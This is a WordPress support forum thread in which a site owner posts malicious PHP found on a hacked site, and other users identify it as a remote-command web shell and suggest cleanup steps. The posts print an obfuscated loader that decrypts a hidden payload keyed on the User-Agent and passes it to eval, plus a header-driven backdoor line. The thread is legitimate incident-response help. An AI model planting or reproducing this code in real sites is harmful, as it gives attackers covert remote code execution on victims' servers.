Title: WordPress infected/hacked
Last modified: July 20, 2023

---

# WordPress infected/hacked

 *  [Adrian Ghio](https://wordpress.org/support/users/aghio/)
 * (@aghio)
 * [2 years, 10 months ago](https://wordpress.org/support/topic/wordpress-infected-hacked/)
 * Our wordpress site was infected or hacked with some kind of malicious code.
 * This is what I got. Do you know what kind of virus is it and how to clean the
   site? Thanks!
 *     ```wp-block-code
       <?php
   
       /*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*/
   
       $file = FILE ;
   
       $str = file_get_contents($file);
   
       if(preg_match('#/*(.*?)*/#si', $str, $match))$string = trim($match[1]);elseexit;
   
       $key = $_SERVER['HTTP_USER_AGENT'];$key = md5($key);$key_length = strlen( $key );$string = base64_decode($string);$string_length=strlen($string);$rndkey=$box=array();$result='';for($i=0;$i<=800;$i++){$box[$i]=ord($key[$i%$key_length]);}
   
       for($a=$j=$i=0;$i<$string_length;$i++){$result.=chr(ord($string[$i])^($box[$i%256]));}
   
       if(substr($result,0,8)==substr(md5(substr($result,8).$key),0,8)){$result = substr($result,8);eval($result);}
       ```
   
 * The page I need help with: _[[log in](https://login.wordpress.org/?redirect_to=https%3A%2F%2Fwordpress.org%2Fsupport%2Ftopic%2Fwordpress-infected-hacked%2F%3Foutput_format%3Dmd&locale=en_US)
   to see the link]_

Viewing 7 replies - 1 through 7 (of 7 total)

 *  [MilesWeb](https://wordpress.org/support/users/milesweb/)
 * (@milesweb)
 * [2 years, 10 months ago](https://wordpress.org/support/topic/wordpress-infected-hacked/#post-16909539)
 * Is this in your index.php file ? If yes, re installing WordPress core files should
   fix it. Other than this, look for unwanted files and folders under your accounts.
   If you do not need them, please download and remove them. Let us know the outcome.
   **
   Note: Please make sure you backup the data. **
    -  This reply was modified 2 years, 10 months ago by [Yui](https://wordpress.org/support/users/fierevere/).
    -  This reply was modified 2 years, 10 months ago by [MilesWeb](https://wordpress.org/support/users/milesweb/).
 *  Moderator [Yui](https://wordpress.org/support/users/fierevere/)
 * (@fierevere)
 * 永子
 * [2 years, 10 months ago](https://wordpress.org/support/topic/wordpress-infected-hacked/#post-16909540)
 * Its a generic web shell used to execute remote commands.
 * There should be other vulnerability somewhere, which allowed remote attacker 
   to install this shell and possibly otherwise to infest your site with other kind
   of malware.
   You can start with this article[https://wordpress.org/documentation/article/faq-my-site-was-hacked/](https://wordpress.org/documentation/article/faq-my-site-was-hacked/)
 *  Thread Starter [Adrian Ghio](https://wordpress.org/support/users/aghio/)
 * (@aghio)
 * [2 years, 10 months ago](https://wordpress.org/support/topic/wordpress-infected-hacked/#post-16909981)
 * [@fierevere](https://wordpress.org/support/users/fierevere/), [@milesweb](https://wordpress.org/support/users/milesweb/)
   thanks both for this info. I will check those links to see what else can we do
   with this.
 * till now, it looks clean….
   Thanks again.
 *  Thread Starter [Adrian Ghio](https://wordpress.org/support/users/aghio/)
 * (@aghio)
 * [2 years, 10 months ago](https://wordpress.org/support/topic/wordpress-infected-hacked/#post-16910205)
 * Here, more info…
 * It looks like we were infected with “Trojan.PHP.Agent.gen.532”
 *  Thread Starter [Adrian Ghio](https://wordpress.org/support/users/aghio/)
 * (@aghio)
 * [2 years, 9 months ago](https://wordpress.org/support/topic/wordpress-infected-hacked/#post-16914889)
 * Now, more details…. I saw this in several php files:
 * $_HEADERS=getallheaders();if(isset($_HEADERS[‘If-Modified-Since’])){$dbx_convert
   =$_HEADERS[‘If-Modified-Since’](”, $_HEADERS[‘Sec-Websocket-Accept’](https://wordpress.org/support/topic/wordpress-infected-hacked/$_HEADERS['X-Dns-Prefetch-Control']?output_format=md));
   $dbx_convert();}
 * Does someone knows what kind of troyan or malicious code is this?
 * I really can´t stop him….
 *  Thread Starter [Adrian Ghio](https://wordpress.org/support/users/aghio/)
 * (@aghio)
 * [2 years, 9 months ago](https://wordpress.org/support/topic/wordpress-infected-hacked/#post-16914902)
 * And this….
 * return array(‘dependencies’ => array(‘react’, ‘wc-price-format’, ‘wc-settings’,‘
   wp-block-editor’, ‘wp-blocks’, ‘wp-components’, ‘wp-data’, ‘wp-dom’, ‘wp-element’,‘
   wp-i18n’, ‘wp-polyfill’, ‘wp-primitives’), ‘version’ => ‘aabdcaf2b8c977161222a8b795694ea1’);
 *  [MilesWeb](https://wordpress.org/support/users/milesweb/)
 * (@milesweb)
 * [2 years, 9 months ago](https://wordpress.org/support/topic/wordpress-infected-hacked/#post-16961786)
 * You should try using Malcare OR Sucuri and clean the files if they are infected.
   Other option is to consider using a WAF protection OR real time scanning option
   which would clean and quarantine the files automatically.

Viewing 7 replies - 1 through 7 (of 7 total)

The topic ‘WordPress infected/hacked’ is closed to new replies.

## Tags

 * [infection](https://wordpress.org/support/topic-tag/infection/)

 * In: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
 * 8 replies
 * 3 participants
 * Last reply from: [MilesWeb](https://wordpress.org/support/users/milesweb/)
 * Last activity: [2 years, 9 months ago](https://wordpress.org/support/topic/wordpress-infected-hacked/#post-16961786)
 * Status: not resolved

## Topics

### Topics with no replies

### Non-support topics

### Resolved topics

### Unresolved topics

### All topics